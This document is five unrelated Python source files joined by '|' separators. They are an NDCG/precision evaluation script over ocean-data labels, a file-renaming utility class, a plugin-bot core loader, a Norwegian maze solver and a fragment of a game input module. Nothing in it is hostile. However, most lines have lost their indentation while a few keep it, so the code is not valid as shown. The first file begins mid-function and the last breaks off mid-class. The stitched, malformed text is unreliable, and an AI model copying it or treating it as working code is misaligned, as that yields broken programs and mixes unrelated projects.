temp_list3 = label3['label'].tolist()
temp_list4 = label4['label'].tolist()
temp_list5 = label5['label'].tolist()
temp_list6 = label6['label'].tolist()
temp_list7 = label7['label'].tolist()
temp_list8 = label8['label'].tolist()
temp_list9 = label9['label'].tolist()
    # Map the textual relevance labels to integer grades (7 = best, 0 = unknown).
    label_map = {'Excellent': 7, 'Very good': 6, 'Good': 5, 'Ok': 4,
                 'Bad': 3, 'Very bad': 2, 'Terrible': 1}
    label_list1 = [label_map.get(label, 0) for label in temp_list1]
    label_list2 = [label_map.get(label, 0) for label in temp_list2]
    label_list3 = [label_map.get(label, 0) for label in temp_list3]
    label_list4 = [label_map.get(label, 0) for label in temp_list4]
    label_list5 = [label_map.get(label, 0) for label in temp_list5]
    label_list6 = [label_map.get(label, 0) for label in temp_list6]
    label_list7 = [label_map.get(label, 0) for label in temp_list7]
    label_list8 = [label_map.get(label, 0) for label in temp_list8]
    label_list9 = [label_map.get(label, 0) for label in temp_list9]
NDCG_list1 = []
NDCG_list2 = []
NDCG_list3 = []
NDCG_list4 = []
NDCG_list5 = []
NDCG_list6 = []
NDCG_list7 = []
NDCG_list8 = []
NDCG_list9 = []
    # NDCG at cut-off depths 1..40.
    for k in range(1, 41):
NDCG_list1.append(getNDCG(label_list1,k))
NDCG_list2.append(getNDCG(label_list2,k))
NDCG_list3.append(getNDCG(label_list3,k))
NDCG_list4.append(getNDCG(label_list4,k))
NDCG_list5.append(getNDCG(label_list5,k))
NDCG_list6.append(getNDCG(label_list6,k))
NDCG_list7.append(getNDCG(label_list7,k))
NDCG_list8.append(getNDCG(label_list8,k))
NDCG_list9.append(getNDCG(label_list9,k))
precision_list1 = []
precision_list2 = []
precision_list3 = []
precision_list4 = []
precision_list5 = []
precision_list6 = []
precision_list7 = []
precision_list8 = []
precision_list9 = []
    # Precision at cut-off depths 1..40.
    for k in range(1, 41):
precision_list1.append(getPrecision(label_list1,k))
precision_list2.append(getPrecision(label_list2,k))
precision_list3.append(getPrecision(label_list3,k))
precision_list4.append(getPrecision(label_list4,k))
precision_list5.append(getPrecision(label_list5,k))
precision_list6.append(getPrecision(label_list6,k))
precision_list7.append(getPrecision(label_list7,k))
precision_list8.append(getPrecision(label_list8,k))
precision_list9.append(getPrecision(label_list9,k))
total_list_NDCG = []
for i in range(len(NDCG_list1)):
average = (NDCG_list1[i] + NDCG_list2[i]+ NDCG_list3[i] + NDCG_list4[i]+ NDCG_list5[i] + NDCG_list6[i] + NDCG_list7[i] + NDCG_list8[i] + NDCG_list9[i])/9
array = np.array([NDCG_list1[i],NDCG_list2[i], NDCG_list3[i], NDCG_list4[i], NDCG_list5[i], NDCG_list6[i], NDCG_list7[i], NDCG_list8[i], NDCG_list9[i], average])
total_list_NDCG.append(array)
total_list_precision = []
for i in range(len(precision_list1)):
average = (precision_list1[i] + precision_list2[i]+ precision_list3[i] + precision_list4[i]+ precision_list5[i] + precision_list6[i] + precision_list7[i] + precision_list8[i] + precision_list9[i])/9
array = np.array([precision_list1[i],precision_list2[i], precision_list3[i], precision_list4[i], precision_list5[i], precision_list6[i], precision_list7[i], precision_list8[i], precision_list9[i], average])
total_list_precision.append(array)
with open('data/results/rank/' + algorithm + 'NDCG_graph.csv', 'w', encoding = 'utf-8-sig') as outcsv:
writer = csv.writer(outcsv)
writer.writerow(['label'])
writer.writerow(['gravity', 'ocean_pressure', 'ocean_temperature', 'ocean_wind', 'pathfinder','quikscat', 'radar', 'saline_density','sea_ice', algorithm])
for i in total_list_NDCG:
writer.writerow(i)
with open('data/results/rank/' + algorithm + 'precision_graph.csv', 'w', encoding = 'utf-8-sig') as outcsv:
writer = csv.writer(outcsv)
writer.writerow(['label'])
writer.writerow(['gravity', 'ocean_pressure', 'ocean_temperature', 'ocean_wind', 'pathfinder','quikscat', 'radar', 'saline_density','sea_ice', algorithm])
for i in total_list_precision:
writer.writerow(i)
|
# -*- coding: utf-8 -*-
from operator import itemgetter
from unicodedata import normalize
import fnmatch
import logging
import os
import re
import string
import helpers
log = logging.getLogger("fileops")
class FileOps(object):
def __init__(self, casemode=0, countpos=0, dirsonly=False, exclude="",
filesonly=False, hidden=False, ignorecase=False,
interactive=False, keepext=False, mediamode=False,
noclobber=False, recursive=False, regex=False, remdups=False,
remext=False, remnonwords=False, remsymbols=False,
simulate=False, spacemode=0, quiet=False, verbosity=1,
matchpattern="", replacepattern="", recursivedepth=0):
# Universal options:
try:
self._casemode = int(casemode) # 0=lc, 1=uc, 2=flfw, 3=flew
except TypeError:
self._casemode = 0
try:
self._countpos = int(countpos) # Adds numerical index at position.
except TypeError:
self._countpos = 0
        try:
            self._spacemode = int(spacemode)  # 0=su, 1=sh, 2=sd, 3=ds, 4=hs, 5=us
        except TypeError:
            self._spacemode = 0
self._dirsonly = dirsonly # Only edit directory names.
self._filesonly = False if dirsonly else filesonly # Only file names.
self._hidden = hidden # Look at hidden files and directories, too.
self._ignorecase = ignorecase # Case sensitivity.
self._interactive = interactive # Confirm before overwriting.
self._keepext = keepext # Don't modify remext.
self._mediamode = mediamode # Mode to sanitize NTFS-filenames/dirnames.
self._noclobber = noclobber # Don't overwrite anything.
self._recursive = recursive # Look for files recursively
self._regex = regex # Use regular expressions instead of glob/fnmatch.
self._remdups = remdups # Remove remdups.
self._remext = remext # Remove all remext.
self._remnonwords = remnonwords # Only allow wordchars (\w)
self._remsymbols = remsymbols # Normalize remsymbols (ñé becomes ne).
self._simulate = simulate # Simulate renaming and dump result to stdout.
# Initialize GUI options.
self._recursivedepth = recursivedepth
self._excludeedit = "" if not exclude else exclude
self._matchedit = "" if not matchpattern else matchpattern
self._replaceedit = "" if not replacepattern else replacepattern
self._autostop = False # Automatically stop execution on rename error.
self._countbase = 1 # Base to start counting from.
self._countfill = True # 9->10: 9 becomes 09. 99->100: 99 becomes 099.
self._countpreedit = "" # String that is prepended to the counter.
self._countstep = 1 # Increment per count iteration.
self._countsufedit = "" # String that is appended to the counter.
self._deletecheck = False # Whether to delete a specified range.
self._deleteend = 1 # End index of deletion sequence.
self._deletestart = 0 # Start index of deletion sequence.
self._filteredit = ""
self._insertcheck = False # Whether to apply an insertion.
self._insertedit = "" # The inserted text/string.
self._insertpos = 0 # Position/Index to insert at.
self._manualmirror = False # Mirror manual rename to all targets.
self._matchcheck = True # Whether to apply source/target patterns.
self._matchexcludecheck = False
self._matchfiltercheck = False
self._matchreplacecheck = True
        self._casecheck = isinstance(casemode, str)
        self._countcheck = isinstance(countpos, str)
        removelist = [remdups, remext, remnonwords, remsymbols]
        self._removecheck = any(removelist)
        self._spacecheck = isinstance(spacemode, str)
        self._varcheck = False  # Backing field for the varcheck property below.
self.stopupdate = False
self.stopcommit = False
self.includes = set()
self.excludes = set()
self.recursiveincludes = set()
self.recursiveexcludes = set()
self.configdir = helpers.get_configdir()
# Create the logger.
helpers.configure_logger(verbosity, quiet, self.configdir)
        self.history = []  # History of committed operations, used to undo them.
        # Match everything inside one set of braces:
        self.bracerx = re.compile(r"(?<=\{)(.*?)(?=\})")
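        # For example, self.bracerx.findall("shot_{2014}_{raw}.jpg") yields
        # ["2014", "raw"]: only the text between each brace pair is captured.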
def match_filter(self, target):
if not self.filteredit:
return True
if "/" in self.filteredit:
patterns = self.filteredit.split("/")
else:
patterns = [self.filteredit]
if self.regex:
for pattern in patterns:
try:
if re.search(pattern, target, flags=self.ignorecase):
return True
                except re.error:
                    pass  # Skip patterns that are not valid regexes.
else:
for pattern in patterns:
if fnmatch.fnmatch(target, pattern):
return True
return False
def match_exclude(self, target):
if not self.excludeedit:
return
if "/" in self.excludeedit:
patterns = self.excludeedit.split("/")
else:
patterns = [self.excludeedit]
if self.regex:
for pattern in patterns:
try:
if re.search(pattern, target, flags=self.ignorecase):
return False
                except re.error:
                    pass  # Skip patterns that are not valid regexes.
else:
for pattern in patterns:
if fnmatch.fnmatch(target, pattern):
return False
def match(self, target):
"""Searches target for pattern and returns a bool."""
if not self.hidden and target.startswith("."):
return False
if self.matchexcludecheck:
if self.match_exclude(target) is False:
return False
if self.excludes and target in self.excludes:
return False
if self.includes and target in self.includes:
return True
if self.matchfiltercheck:
if self.match_filter(target) is False:
return False
return True
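    # match() precedence, in order: hidden names are rejected first, then the
    # exclude pattern, then the explicit excludes set, then the explicit
    # includes set (which short-circuits to True), and finally the filter
    # pattern. A name in self.includes is therefore kept even when the filter
    # pattern would have rejected it.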
def get_dirs(self, root, dirs):
"""Sort, match and decode a list of dirs."""
return [(root, d.decode("utf-8"), u"") for d in dirs if self.match(d)]
def get_files(self, root, files):
"""Sort, match and decode a list of files."""
return [(root,) + os.path.splitext(f.decode("utf-8")) for f in
files if self.match(f)]
def get_targets(self, path=None):
"""Return a list of files and/or dirs in path."""
if not path:
path = os.getcwd()
# Determine recursion depth.
levels = 0
if self.recursive:
levels = self.recursivedepth
targets = []
for root, dirs, files in helpers.walklevels(path, levels):
# To unicode.
root = root.decode("utf-8") + "/"
if self.dirsonly:
target = self.get_dirs(root, dirs)
elif self.filesonly:
target = self.get_files(root, files)
else:
target = self.get_dirs(root, dirs) + self.get_files(root, files)
targets.extend(target)
if self.stopupdate:
return targets
return targets
def get_previews(self, targets, matchpat=None, replacepat=None):
"""Simulate rename operation on targets and return results as list."""
if matchpat:
self.matchedit = matchpat
if replacepat:
self.replaceedit = replacepat
if self.mediamode:
self.set_mediaoptions()
return self.modify_previews(targets)
def set_mediaoptions(self):
self.casecheck = True
self.spacecheck = True
self.removecheck = True
self.casemode = 0
self.spacemode = 6
self.remdups = True
self.keepext = True
self.remsymbols = True
def commit(self, previews):
# The sorted generator comprehension of (unicode)doom:
# Reverse sort the paths so that the longest paths are changed first.
# This should minimize rename errors for recursive operations, for now.
actions = sorted((("".join(i[0]).encode("utf-8"), i[0][0].encode("utf-8")
+ i[1].encode("utf-8")) for i in previews),
key=lambda i: i[0].count("/"), reverse=True)
for i in actions:
if self.simulate:
log.debug("{} -> {}.".format(i[0], i[1]))
continue
if self.stopcommit:
idx = actions.index(i)
log.warn("Stopping commit after {} renames." .format(idx + 1))
if idx:
log.warn("Use undo to revert the rename actions.")
self.history.append(actions[:idx + 1])
return
try:
os.rename(i[0], i[1])
except Exception as e:
log.debug("Rename Error: {} -> {} ({}).".format(i[0], i[1], e))
if self.autostop:
break
self.history.append(actions)
log.info("Renaming complete.")
def undo(self, actions=None):
if actions is None:
try:
actions = self.history.pop()
except IndexError:
log.error("History list is empty.")
return
for i in actions:
if self.simulate:
log.debug("{} -> {}.".format(i[1], i[0]))
continue
try:
os.rename(i[1], i[0])
except Exception as e:
log.error("Rename Error: {} -> {} ({}).".format(i[1], i[0], e))
if self.autostop:
break
log.info("Undo complete.")
def modify_previews(self, previews):
if self.countcheck:
lenp, base, step = len(previews), self.countbase, self.countstep
countlen = len(str(lenp))
countrange = xrange(base, lenp * step + 1, step)
if self.countfill:
count = (str(i).rjust(countlen, "0") for i in countrange)
else:
count = (str(i) for i in countrange)
modified = []
for preview in previews:
name = preview[1]
if not self.remext and not self.keepext:
name += preview[2]
if self.casecheck:
name = self.apply_case(name)
if self.spacecheck:
name = self.apply_space(name)
if self.deletecheck:
name = self.apply_delete(name)
if self.removecheck:
name = self.apply_remove(name)
if self.insertcheck:
name = self.apply_insert(name)
if self.matchcheck:
name = self.apply_replace(name)
if self.countcheck:
try:
name = self.apply_count(name, count.next())
except StopIteration:
pass
if self.keepext:
name += preview[2]
preview = ((preview[0], preview[1] + preview[2]), name)
modified.append(preview)
return modified
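    # Modifier pipeline order, as applied above: case -> spacing -> deletion
    # -> removal -> insertion -> match/replace -> counter. The extension is
    # stripped before the pipeline runs and re-appended at the end when
    # keepext is set.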
def apply_space(self, s):
if not self.spacecheck:
return s
if self.spacemode == 0:
s = s.replace(" ", "_")
elif self.spacemode == 1:
s = s.replace(" ", "-")
elif self.spacemode == 2:
s = s.replace(" ", ".")
elif self.spacemode == 3:
s = s.replace(".", " ")
elif self.spacemode == 4:
s = s.replace("-", " ")
elif self.spacemode == 5:
s = s.replace("_", " ")
elif self.spacemode == 6:
s = re.sub("[.\s]", "_", s)
return s
def apply_case(self, s):
if not self.casecheck:
return s
if self.casemode == 0:
s = s.lower()
elif self.casemode == 1:
s = s.upper()
elif self.casemode == 2:
s = s.capitalize()
elif self.casemode == 3:
s = " ".join([c.capitalize() for c in s.split()])
return s
def apply_insert(self, s):
if not self.insertcheck or not self.insertedit:
return s
s = list(s)
s.insert(self.insertpos, self.insertedit)
return "".join(s)
def apply_count(self, s, count):
if not self.countcheck:
return s
s = list(s)
if self.countpreedit:
count = self.countpreedit + count
if self.countsufedit:
count += self.countsufedit
s.insert(self.countpos, count)
return "".join(s)
def apply_delete(self, s):
if not self.deletecheck:
return s
return s[:self.deletestart] + s[self.deleteend:]
def apply_remove(self, s):
if not self.removecheck:
return s
if self.remnonwords:
s = re.sub("\W", "", s, flags=self.ignorecase)
if self.remsymbols:
allowed = string.ascii_letters + string.digits + " .-_+" # []()
s = "".join(c for c in normalize("NFKD", s) if c in allowed)
if self.remdups:
s = re.sub(r"([-_ .])\1+", r"\1", s, flags=self.ignorecase)
return s
def apply_replace(self, s):
if not self.matchreplacecheck or not self.matchedit:
return s
if not self.regex:
matchpat = fnmatch.translate(self.matchedit)
replacepat = helpers.translate(self.replaceedit)
else:
matchpat = self.matchedit
replacepat = self.replaceedit
try:
s = re.sub(matchpat, replacepat, s, flags=self.ignorecase)
        except re.error:
            pass  # Leave the name unchanged if the pattern is invalid.
return s
@property
def dirsonly(self):
return self._dirsonly
@dirsonly.setter
def dirsonly(self, boolean):
log.debug("dirsonly: {}".format(boolean))
self._dirsonly = boolean
if boolean:
self.filesonly = False
@property
def filesonly(self):
return self._filesonly
@filesonly.setter
def filesonly(self, boolean):
log.debug("filesonly: {}".format(boolean))
self._filesonly = boolean
if boolean:
self.dirsonly = False
@property
def recursive(self):
return self._recursive
@recursive.setter
def recursive(self, boolean):
log.debug("recursive: {}".format(boolean))
self._recursive = boolean
@property
def recursivedepth(self):
return self._recursivedepth
@recursivedepth.setter
def recursivedepth(self, num):
log.debug("recursivedepth: {}".format(num))
self._recursivedepth = num
@property
def hidden(self):
return self._hidden
@hidden.setter
def hidden(self, boolean):
log.debug("hidden: {}".format(boolean))
self._hidden = boolean
@property
def simulate(self):
return self._simulate
@simulate.setter
def simulate(self, boolean):
log.debug("simulate: {}".format(boolean))
self._simulate = boolean
@property
def interactive(self):
return self._interactive
@interactive.setter
def interactive(self, boolean):
log.debug("interactive: {}".format(boolean))
self._interactive = boolean
@property
def noclobber(self):
return self._noclobber
@noclobber.setter
def noclobber(self, boolean):
log.debug("noclobber: {}".format(boolean))
self._noclobber = boolean
@property
def keepext(self):
return self._keepext
@keepext.setter
def keepext(self, boolean):
log.debug("keepext: {}.".format(boolean))
self._keepext = boolean
@property
def regex(self):
return self._regex
@regex.setter
def regex(self, boolean):
log.debug("regex: {}.".format(boolean))
self._regex = boolean
@property
def varcheck(self):
return self._varcheck
@varcheck.setter
def varcheck(self, boolean):
log.debug("varcheck: {}".format(boolean))
self._varcheck = boolean
@property
def matchcheck(self):
return self._matchcheck
@matchcheck.setter
def matchcheck(self, boolean):
log.debug("matchcheck: {}".format(boolean))
self._matchcheck = boolean
@property
def matchexcludecheck(self):
return self._matchexcludecheck
@matchexcludecheck.setter
def matchexcludecheck(self, boolean):
log.debug("matchexcludecheck: {}".format(boolean))
self._matchexcludecheck = boolean
@property
def matchfiltercheck(self):
return self._matchfiltercheck
@matchfiltercheck.setter
def matchfiltercheck(self, boolean):
log.debug("matchfiltercheck: {}".format(boolean))
self._matchfiltercheck = boolean
@property
def matchreplacecheck(self):
return self._matchreplacecheck
@matchreplacecheck.setter
def matchreplacecheck(self, boolean):
log.debug("matchreplacecheck: {}".format(boolean))
self._matchreplacecheck = boolean
@property
def countpreedit(self):
return self._countpreedit
@countpreedit.setter
def countpreedit(self, text):
log.debug("countpreedit: {}".format(text))
self._countpreedit = text.decode("utf-8")
@property
def countsufedit(self):
return self._countsufedit
@countsufedit.setter
def countsufedit(self, text):
log.debug("countsufedit: {}".format(text))
self._countsufedit = text.decode("utf-8")
@property
def insertedit(self):
return self._insertedit
@insertedit.setter
def insertedit(self, text):
log.debug("insertedit: {}.".format(text))
self._insertedit = text.decode("utf-8")
@property
def matchedit(self):
return self._matchedit
@matchedit.setter
def matchedit(self, text):
log.debug("matchedit: {}.".format(text))
self._matchedit = text.decode("utf-8")
@property
def replaceedit(self):
return self._replaceedit
@replaceedit.setter
def replaceedit(self, text):
log.debug("replaceedit: {}.".format(text))
self._replaceedit = text.decode("utf-8")
@property
def filteredit(self):
return self._filteredit
@filteredit.setter
def filteredit(self, text):
log.debug("filteredit: {}.".format(text))
self._filteredit = text.decode("utf-8")
@property
def excludeedit(self):
return self._excludeedit
@excludeedit.setter
def excludeedit(self, text):
log.debug("excludeedit: {}.".format(text))
self._excludeedit = text.decode("utf-8")
@property
def remsymbols(self):
return self._remsymbols
@remsymbols.setter
def remsymbols(self, boolean):
log.debug("remsymbols: {}".format(boolean))
self._remsymbols = boolean
@property
def autostop(self):
return self._autostop
@autostop.setter
def autostop(self, boolean):
log.debug("autostop: {}".format(boolean))
self._autostop = boolean
@property
def manualmirror(self):
return self._manualmirror
@manualmirror.setter
def manualmirror(self, boolean):
log.debug("manualmirror: {}".format(boolean))
self._manualmirror = boolean
@property
def removecheck(self):
return self._removecheck
@removecheck.setter
def removecheck(self, boolean):
log.debug("removecheck: {}".format(boolean))
self._removecheck = boolean
@property
def remdups(self):
return self._remdups
@remdups.setter
def remdups(self, boolean):
log.debug("remdups: {}".format(boolean))
self._remdups = boolean
@property
def remext(self):
return self._remext
@remext.setter
def remext(self, boolean):
log.debug("remext: {}".format(boolean))
self._remext = boolean
@property
def remnonwords(self):
return self._remnonwords
@remnonwords.setter
def remnonwords(self, boolean):
log.debug("remnonwords: {}".format(boolean))
self._remnonwords = boolean
@property
def ignorecase(self):
return self._ignorecase
@ignorecase.setter
def ignorecase(self, boolean):
flag = 0
if boolean:
flag = re.I
log.debug("ignorecase: {}".format(boolean))
self._ignorecase = flag
@property
def mediamode(self):
return self._mediamode
@mediamode.setter
def mediamode(self, boolean):
log.debug("mediamode: {}".format(boolean))
self._mediamode = boolean
@property
def countcheck(self):
return self._countcheck
@countcheck.setter
def countcheck(self, boolean):
log.debug("countcheck: {}".format(boolean))
self._countcheck = boolean
@property
def countfill(self):
return self._countfill
@countfill.setter
def countfill(self, boolean):
log.debug("countfill: {}".format(boolean))
self._countfill = boolean
@property
def countpos(self):
return self._countpos
@countpos.setter
def countpos(self, index):
log.debug("countpos: {}".format(index))
self._countpos = index
@property
def countbase(self):
return self._countbase
@countbase.setter
def countbase(self, num):
log.debug("countbase: {}".format(num))
self._countbase = num
@property
def countstep(self):
return self._countstep
@countstep.setter
def countstep(self, num):
log.debug("countstep: {}".format(num))
self._countstep = num
@property
def insertcheck(self):
return self._insertcheck
@insertcheck.setter
def insertcheck(self, boolean):
log.debug("insertcheck: {}".format(boolean))
self._insertcheck = boolean
@property
def insertpos(self):
return self._insertpos
@insertpos.setter
def insertpos(self, index):
log.debug("insertpos: {}".format(index))
self._insertpos = index
@property
def deletecheck(self):
return self._deletecheck
@deletecheck.setter
def deletecheck(self, boolean):
log.debug("deletecheck: {}".format(boolean))
self._deletecheck = boolean
@property
def deletestart(self):
return self._deletestart
@deletestart.setter
def deletestart(self, index):
log.debug("deletestart: {}".format(index))
self._deletestart = index
@property
def deleteend(self):
return self._deleteend
@deleteend.setter
def deleteend(self, index):
log.debug("deleteend: {}".format(index))
self._deleteend = index
@property
def casecheck(self):
return self._casecheck
@casecheck.setter
def casecheck(self, boolean):
log.debug("casecheck: {}".format(boolean))
self._casecheck = boolean
@property
def casemode(self):
return self._casemode
@casemode.setter
def casemode(self, num):
log.debug("casemode: {}".format(num))
self._casemode = num
@property
def spacecheck(self):
return self._spacecheck
@spacecheck.setter
def spacecheck(self, boolean):
log.debug("spacecheck: {}".format(boolean))
self._spacecheck = boolean
@property
def spacemode(self):
return self._spacemode
@spacemode.setter
def spacemode(self, num):
log.debug("spacemode: {}".format(num))
self._spacemode = num
if __name__ == "__main__":
fileops = FileOps(hidden=True, recursive=True, casemode="1")
fileops.get_previews(fileops.get_targets(), "*", "asdf")
|
from PluginManager import PluginManager
from PluginDispatcher import PluginDispatcher
from Configuration import ConfigFile
from Util import call, dictJoin
from sys import path
from os import getcwd
from Logging import LogFile
path.append(getcwd())
log = LogFile("Core")
class Core:
_PluginManager = None
_PluginDispatcher = None
_ResponseObject = None
_Connector = None
_Config = None
def _LoadConnector(self, ConName):
try:
con = __import__("%s.Connector" % ConName,
globals(), locals(), "Connector")
log.debug("Got connector:", con)
cls = getattr(con, "Connector", None)
        except Exception:
            log.exception("Exception while loading connector")
            cls = None
        log.debug("Connector class", cls)
if cls:
c = cls()
log.debug("Connector constructed")
return c
log.critical("No connector")
return cls
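    # Connector lookup convention: the Core:Provider config value names a
    # package, and "<ConName>.Connector" must expose a Connector class. On
    # success an instance is returned; if the import fails, the error is
    # logged and None is returned.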
def HandleEvent(self, event):
log.dict(event,"HandleEvent")
pm = self._PluginManager
if not pm:
log.warning("No plugin manager")
return
pd = self._PluginDispatcher
if not pd:
log.warning("No plugin dispatcher")
return
ro = self._ResponseObject
if not ro:
log.warning("no response object")
pass
matches = pm.GetMatchingFunctions(event)
log.debug("Matched %i hook(s)." % len(matches))
for inst, func, args, servs in matches:
newEvent = dictJoin(event, dictJoin(args,
{"self": inst, "response": ro}))
log.debug("Services found for plugin:", servs)
if servs:
log.debug("Event before processing:", newEvent)
servDict={}
servDict["event"]=newEvent
servDict["pm"]=self._PluginManager
servDict["pd"]=self._PluginDispatcher
servDict["ro"]=self._ResponseObject
servDict["c"]=self._Connector
servDict["core"]=self
servDict["config"]=self._Config
for servName in servs:
serv = pm.GetService(servName)
log.debug("Processing service",servName,serv)
call(serv.onEvent,servDict)
if servs:
log.dict(newEvent,"Event after processing:")
#issue 5 fix goes here
newEvent.update(servDict)
pd.Enqueue((func, newEvent))
def __init__(self):
self._Config = ConfigFile("Core")
        if not self._Config:
            log.critical("No configuration file loaded!")
            return
        ConName = self._Config["Core", "Provider"]
        if ConName is None:
            log.critical("No Core:Provider in Core.cfg")
            self._Connector = None
            return
self._Connector=self._LoadConnector(ConName)
if self._Connector:
self._PluginManager = PluginManager(ConName)
self._PluginDispatcher = PluginDispatcher()
self._Connector.SetEventHandler(self.HandleEvent)
self._ResponseObject = self._Connector.GetResponseObject()
self._PluginDispatcher.SetResponseHandler(
self._Connector.HandleResponse)
def Start(self):
if not self._Connector:
log.warning("Could not start, no connector.")
return
log.debug("Starting")
log.debug("Auto loading plugins")
self.AutoLoad()
log.debug("Auto load complete")
if self._Connector:
log.debug("Connector starting")
self._Connector.Start()
#else log error?
def Stop(self):
log.debug("Stopping")
if self._PluginDispatcher:
self._PluginDispatcher.Stop()
if self._PluginManager:
self._PluginManager.Stop()
if self._Connector:
self._Connector.Stop()
def AutoLoad(self):
if not self._PluginManager:
return
pm = self._PluginManager
log.note("Starting autoload", "Root:" + pm.root)
cf = ConfigFile(pm.root, "Autoload")
lines = ["Configuration:"]
for i in cf:
lines.append(i)
for j in cf[i]:
lines.append(" %s=%s"%(j,cf[i,j]))
log.debug(*lines)
if cf:
log.debug("Autoloading plugins.")
names = cf["Plugins", "Names"]
log.debug("Autoloading plugins", names)
if names:
for name in names.split():
pm.LoadPlugin(name)
log.debug("Autoloading finished.")
            pd = self._PluginDispatcher
            handler = pd.GetResponseHandler()
            log.debug("Updating dedicated thread pool", self._ResponseObject, handler)
            pd.EnsureDedicated(pm.GetDedicated(), self._ResponseObject, handler)
else:
log.note("No Autoload configuration file")
if __name__ == "__main__":
try:
c = Core()
try:
c.Start()
except:
log.exception("Exception while starting.")
c.Stop()
except:
log.exception("Exception while stopping.")
log.debug("End of core")
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 9 00:06:24 2014
@author: kristian
"""
from skumleskogen import *
import time
################## OPTIONS ##################
debug_on = True
write_to_file = True
hukommelse = {}        # Per-node memory: visited children and suspected locks.
sti_totalt = ["inn"]   # Trail of every move, printed when the run ends.
noder_med_lås = set()  # Nodes where a lock has been observed.
forrige_retning = []   # Stack of directions taken, used when backtracking.
file = None
# Keep a handle on the builtin print before it is shadowed below.
_print = print
class Print_To_File(object):
    """A print() stand-in that echoes to stdout and mirrors to output.txt."""
    def __init__(self, *text):
        _print(*text)
        string = "".join(str(t) for t in text)
        if file:
            file.write("\n" + string)
if write_to_file:
print = Print_To_File
file = open("output.txt", mode="a")
class MovementException(Exception):
def __init__(self, error):
self.error = error
def __str__(self):
return str(self.error)
def start_solving():
print("Er inngang:", er_inngang())
nøkler = 0
while True:
debug()
husk_node()
if er_stank():
if gaa_tilbake():
sti_totalt.append("STANK! tilbake til " + str(nummer()))
kom_fra_retning = forrige_retning.pop(len(forrige_retning) - 1)
continue
if er_nokkel():
if plukk_opp():
nøkler += 1
sti_totalt.append("plukket nøkkel " + str(nøkler))
continue
if (not hukommelse[nummer()]["venstre"]) \
or kan_låse_opp(nummer(), nøkler, "venstre"):
try:
hukommelse[nummer()]["lås"][0] = False
hukommelse[nummer()]["superlås"][0] = False
besøk_node("venstre")
except MovementException as ex:
print(ex)
else:
forrige_retning.append("venstre")
sti_totalt.append("venstre " + str(nummer()))
continue
if (not hukommelse[nummer()]["høyre"]) \
or kan_låse_opp(nummer(), nøkler, "høyre"):
try:
hukommelse[nummer()]["lås"][1] = False
hukommelse[nummer()]["superlås"][1] = False
besøk_node("høyre")
except MovementException as ex:
print(ex)
else:
forrige_retning.append("høyre")
sti_totalt.append("høyre " + str(nummer()))
continue
if er_laas():
noder_med_lås.add(nummer())
if er_superlaas():
if nøkler >= 2:
utfall = laas_opp()
if utfall:
nøkler -= 2
sti_totalt.append("låste opp sl " + str(nøkler))
if nummer() in noder_med_lås:
noder_med_lås.remove(nummer())
continue
else:
noder_med_lås.add(nummer())
else:
if nøkler >= 1:
utfall = laas_opp()
if utfall:
nøkler -= 1
sti_totalt.append("låste opp s " + str(nøkler))
if nummer() in noder_med_lås:
noder_med_lås.remove(nummer())
continue
if er_utgang():
gaa_ut()
return
        # We are stuck; some nodes must be locked.
        har_lås = er_laas()
        har_superlås = er_superlaas()
        if har_lås and har_superlås:
            # The lock was not a regular lock after all, but a superlock.
            har_lås = False
        if barn_har_lås(nummer()):
            har_lås = True
        if barn_har_superlås(nummer()):
            har_superlås = True
if gaa_tilbake():
sti_totalt.append("tilbake til " + str(nummer()))
kom_fra_retning = forrige_retning.pop(len(forrige_retning) - 1)
print("kom fra:", kom_fra_retning)
if har_lås:
print("har lås")
if kom_fra_retning == "venstre":
hukommelse[nummer()]["lås"][0] = True
else:
hukommelse[nummer()]["lås"][1] = True
if har_superlås:
print("har superlås")
if kom_fra_retning == "venstre":
hukommelse[nummer()]["superlås"][0] = True
else:
hukommelse[nummer()]["superlås"][1] = True
print(hukommelse[nummer()])
else:
print("KLARTE IKKE Å GÅ TILBAKE!!!")
return
def kan_låse_opp(n, nøkler, retning):
indeks = 0
if retning == "høyre":
indeks = 1
if hukommelse[n]["lås"][indeks] and (nøkler >= 1):
return True
if hukommelse[n]["superlås"][indeks] and (nøkler >= 2):
return True
return False
def barn_har_lås(n):
return hukommelse[n]["lås"][0] or hukommelse[n]["lås"][1]
def barn_har_superlås(n):
return hukommelse[n]["superlås"][0] or hukommelse[n]["superlås"][1]
def husk_node():
n = nummer()
if n not in hukommelse:
hukommelse[n] = {"venstre": False, "høyre": False,
"lås": [False, False], "superlås": [False, False]}
def besøk_node(retning):
n = nummer()
utfall = False
if retning == "venstre":
utfall = gaa_venstre()
elif retning == "høyre":
utfall = gaa_hoyre()
else:
print("Ugyldig retning oppgitt!", n, retning)
return
if utfall:
hukommelse[n][retning] = True
else:
        if er_laas():
            raise MovementException("Node is locked")
        else:
            raise MovementException("Dead end")
def debug():
if debug_on:
print("/"*25 + "DEBUG:" + "/"*25)
print(("Nummer: {n}\n" +
"Type:\n " +
"i: {i}, l: {l}, sl: {sl}, st: {st}, nk: {nk}, v: {v}, u: {u}" +
"\nLabel: {la}")
.format(n=nummer(), i=er_inngang(), l=er_laas(),
sl=er_superlaas(), st=er_stank(), u=er_utgang(),
v=er_vanlig(), nk=er_nokkel(), la=label(nummer())))
def main():
# Initialisation.
    def get_hours():
        return time.strftime("%H:%M:%S")  # Wall-clock time as HH:MM:SS.
start_time = time.time()
print("Starting. Time:", get_hours())
# Start solving the maze.
try:
start_solving()
# In case of failure, e.g. a rabbit ate you.
except Exception as e:
print("Exception occured:")
print(e)
print("Exciting. Time:", get_hours())
# Done, do final actions.
finally:
print("\nRan for {0} seconds.".format(
abs(
round(start_time - time.time(), 4))))
print("Maze completed.")
print(sti_totalt)
if __name__ == "__main__":
main()
if file:
file.close()
|
from orders import *
from gfxs import *
import ids
local_version = "v0.6.0" # major version
revision = "$Revision: 107 $" # updated by subversion
revisionSplitted = revision.split()
if len(revisionSplitted) > 2:
local_version = "%sr%s" % ( local_version, revisionSplitted[1] )
else:
local_version = "%srNA" % ( local_version )
version = "%s_%s" %( local_version, ids.local_version )
if __debug__:
print "PyCaptain %s" % version
class AttackOrder:
    def __init__(self):
        self.target = None
        self.weapon = None
# inputs -> server
class COInput:
def __init__(self,xc=0,yc=0,wc=320,hc=320):
self.xc = xc
self.yc = yc
self.wc = wc
self.hc = hc
self.orders = []
self.mouseDownAt = (0,0)
self.mouseUpAt = (0,0)
self.mouseDownAtV = (0,0)
self.mouseUpAtV = (0,0)
self.mouseUpped = False
self.mouseRightUpped = False
self.mousePos = (0,0)
self.right = False
self.left = False
self.up = False
